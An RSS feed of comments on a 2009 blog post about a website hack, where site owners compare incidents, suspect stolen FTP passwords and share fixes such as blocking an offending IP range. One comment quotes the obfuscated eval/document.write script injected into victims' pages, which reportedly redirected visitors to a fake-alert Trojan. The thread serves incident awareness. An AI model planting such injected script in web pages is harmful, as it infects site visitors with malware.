<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Website hack &#8211; microsotf.cn &#8211; WordPress</title>
	<atom:link href="http://www.mattswanner.com/web-design/website-hack-microsotfcn-wordpress.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.mattswanner.com/web-design/website-hack-microsotfcn-wordpress.html</link>
	<description>Raleigh Graphic and Web Designer - Matt Swanner</description>
	<lastBuildDate>Tue, 14 Jul 2009 11:44:25 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.3</generator>
	<item>
		<title>By: Matt</title>
		<link>http://www.mattswanner.com/web-design/website-hack-microsotfcn-wordpress.html/comment-page-1#comment-360</link>
		<dc:creator>Matt</dc:creator>
		<pubDate>Tue, 14 Jul 2009 11:44:25 +0000</pubDate>
		<guid isPermaLink="false">http://www.mattswanner.com/?p=284#comment-360</guid>
		<description>I read about the ftp passwords. I don&#039;t find that too hard to believe, but last night my Bludomain site was hacked again and I had THEM change my password the last time it happened, so I don&#039;t think FTP passwords are the only way in.</description>
		<content:encoded><![CDATA[<p>I read about the ftp passwords. I don&#8217;t find that too hard to believe, but last night my Bludomain site was hacked again and I had THEM change my password the last time it happened, so I don&#8217;t think FTP passwords are the only way in.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Rob</title>
		<link>http://www.mattswanner.com/web-design/website-hack-microsotfcn-wordpress.html/comment-page-1#comment-359</link>
		<dc:creator>Rob</dc:creator>
		<pubDate>Tue, 14 Jul 2009 05:43:49 +0000</pubDate>
		<guid isPermaLink="false">http://www.mattswanner.com/?p=284#comment-359</guid>
		<description>Happened to me too - 5 sites taken out. For the second time. If you don&#039;t mind, what host are you using? I&#039;m using 1and1.com. I&#039;m wondering if there&#039;s a commonality amongst us. 

It&#039;s been suggested from other sites in my research that they may be using your own ftp software by stealing your saved usernames and passwords. Not sure if that&#039;s how they&#039;re getting in to our servers so easy but it couldn&#039;t hurt to save them in a separate encrypted file. Some also say that it doesn&#039;t matter if you save them with the ftp client or not since they&#039;ll grab them once you try and connect to your server and that the only safe way to transfer files is SSH.</description>
		<content:encoded><![CDATA[<p>Happened to me too &#8211; 5 sites taken out. For the second time. If you don&#8217;t mind, what host are you using? I&#8217;m using 1and1.com. I&#8217;m wondering if there&#8217;s a commonality amongst us. </p>
<p>It&#8217;s been suggested from other sites in my research that they may be using your own ftp software by stealing your saved usernames and passwords. Not sure if that&#8217;s how they&#8217;re getting in to our servers so easy but it couldn&#8217;t hurt to save them in a separate encrypted file. Some also say that it doesn&#8217;t matter if you save them with the ftp client or not since they&#8217;ll grab them once you try and connect to your server and that the only safe way to transfer files is SSH.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: A&#38;C Enterprise (Allen)</title>
		<link>http://www.mattswanner.com/web-design/website-hack-microsotfcn-wordpress.html/comment-page-1#comment-358</link>
		<dc:creator>A&#38;C Enterprise (Allen)</dc:creator>
		<pubDate>Sat, 11 Jul 2009 12:54:41 +0000</pubDate>
		<guid isPermaLink="false">http://www.mattswanner.com/?p=284#comment-358</guid>
		<description>http://rockymountainenvironmental.com/
07/04/09 --- 8:16am
Altered files: index.htm, index.html, default.asp, main.html
Offending Code: document.write(&quot;&lt;/i&gt;&#039;);document.write(&quot;&lt;/i&gt;&#039;);document.write(&quot;&quot;);
The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.

07/09/09 --- 6:11AM
NEW OFFENDING CODE 
eval(&quot;d((*)&amp;!o$^!%c$[[^@&amp;um((*)&amp;!e$[[^@&amp;n[@&amp;%^t.w$[[^@&amp;r((*)&amp;!i((*)&amp;!t$^!%e(&amp;@)&amp;](&#039;(&amp;@)&amp;]&lt;i&gt;&#039;$^!%)$[[^@&amp;;[@&amp;%^&quot;.replace(/\(\&amp;\@\)\&amp;\]&#124;\$\^\!\%&#124;\(\(\*\)\&amp;\!&#124;\$\[\[\^\@\&amp;&#124;\[\@\&amp;\%\^/ig, &quot;&quot;))
This redirect bypassed my script calls and proceeded to download malware.
Malware: [braviax (fakealeart Trojan)]&amp; [ID12 Undetermined self replicating virus]
I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don&#039;t have access or admin rights to .htaccess. Best of luck to all.
(Allen)</description>
		<content:encoded><![CDATA[<p><a href="http://rockymountainenvironmental.com/" rel="nofollow">http://rockymountainenvironmental.com/</a><br />
07/04/09 &#8212; 8:16am<br />
Altered files: index.htm, index.html, default.asp, main.html<br />
Offending Code: document.write(&#8220;&#8216;);document.write(&#8220;&#8216;);document.write(&#8220;&#8221;);<br />
The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.</p>
<p>07/09/09 &#8212; 6:11AM<br />
NEW OFFENDING CODE<br />
eval(&#8220;d((*)&amp;!o$^!%c$[[^@&amp;um((*)&amp;!e$[[^@&amp;n[@&amp;%^t.w$[[^@&amp;r((*)&amp;!i((*)&amp;!t$^!%e(&amp;@)&amp;](&#8216;(&amp;@)&amp;]<i>&#8216;$^!%)$[[^@&amp;;[@&amp;%^".replace(/\(\&amp;\@\)\&amp;\]|\$\^\!\%|\(\(\*\)\&amp;\!|\$\[\[\^\@\&amp;|\[\@\&amp;\%\^/ig, ""))<br />
This redirect bypassed my script calls and proceeded to download malware.<br />
Malware: [braviax (fakealeart Trojan)]&amp; [ID12 Undetermined self replicating virus]<br />
I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don&#8217;t have access or admin rights to .htaccess. Best of luck to all.<br />
(Allen)</i></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: pissedoff</title>
		<link>http://www.mattswanner.com/web-design/website-hack-microsotfcn-wordpress.html/comment-page-1#comment-356</link>
		<dc:creator>pissedoff</dc:creator>
		<pubDate>Fri, 10 Jul 2009 00:27:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.mattswanner.com/?p=284#comment-356</guid>
		<description>Cool - contacted host and advised them - thanks heaps for the I.P range was a great help ... lets hope my host are as helpful.


Cheers</description>
		<content:encoded><![CDATA[<p>Cool &#8211; contacted host and advised them &#8211; thanks heaps for the I.P range was a great help &#8230; lets hope my host are as helpful.</p>
<p>Cheers</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Matt</title>
		<link>http://www.mattswanner.com/web-design/website-hack-microsotfcn-wordpress.html/comment-page-1#comment-355</link>
		<dc:creator>Matt</dc:creator>
		<pubDate>Thu, 09 Jul 2009 14:33:06 +0000</pubDate>
		<guid isPermaLink="false">http://www.mattswanner.com/?p=284#comment-355</guid>
		<description>Contact your server administrator (in my case my shared hosting companies) and let them know what&#039;s going on. If they&#039;re even remotely worth doing business with they will investigate and block the offending ip address (91.212.198.37 ) or better yet, the entire range: 91.212.*.*

My host is awesome - &lt;a href=&quot;http://www.mattswanner.com/links/glitterhost.html&quot; rel=&quot;nofollow&quot;&gt;Glitterhost&lt;/a&gt; - servers are some of the fastest in the US. The owner of the company returns phone calls personally, and they blocked that ip address for me within hours of my contacting them.</description>
		<content:encoded><![CDATA[<p>Contact your server administrator (in my case my shared hosting companies) and let them know what&#8217;s going on. If they&#8217;re even remotely worth doing business with they will investigate and block the offending ip address (91.212.198.37 ) or better yet, the entire range: 91.212.*.*</p>
<p>My host is awesome &#8211; <a href="http://www.mattswanner.com/links/glitterhost.html" rel="nofollow">Glitterhost</a> &#8211; servers are some of the fastest in the US. The owner of the company returns phone calls personally, and they blocked that ip address for me within hours of my contacting them.</p>
]]></content:encoded>
	</item>
</channel>
</rss>

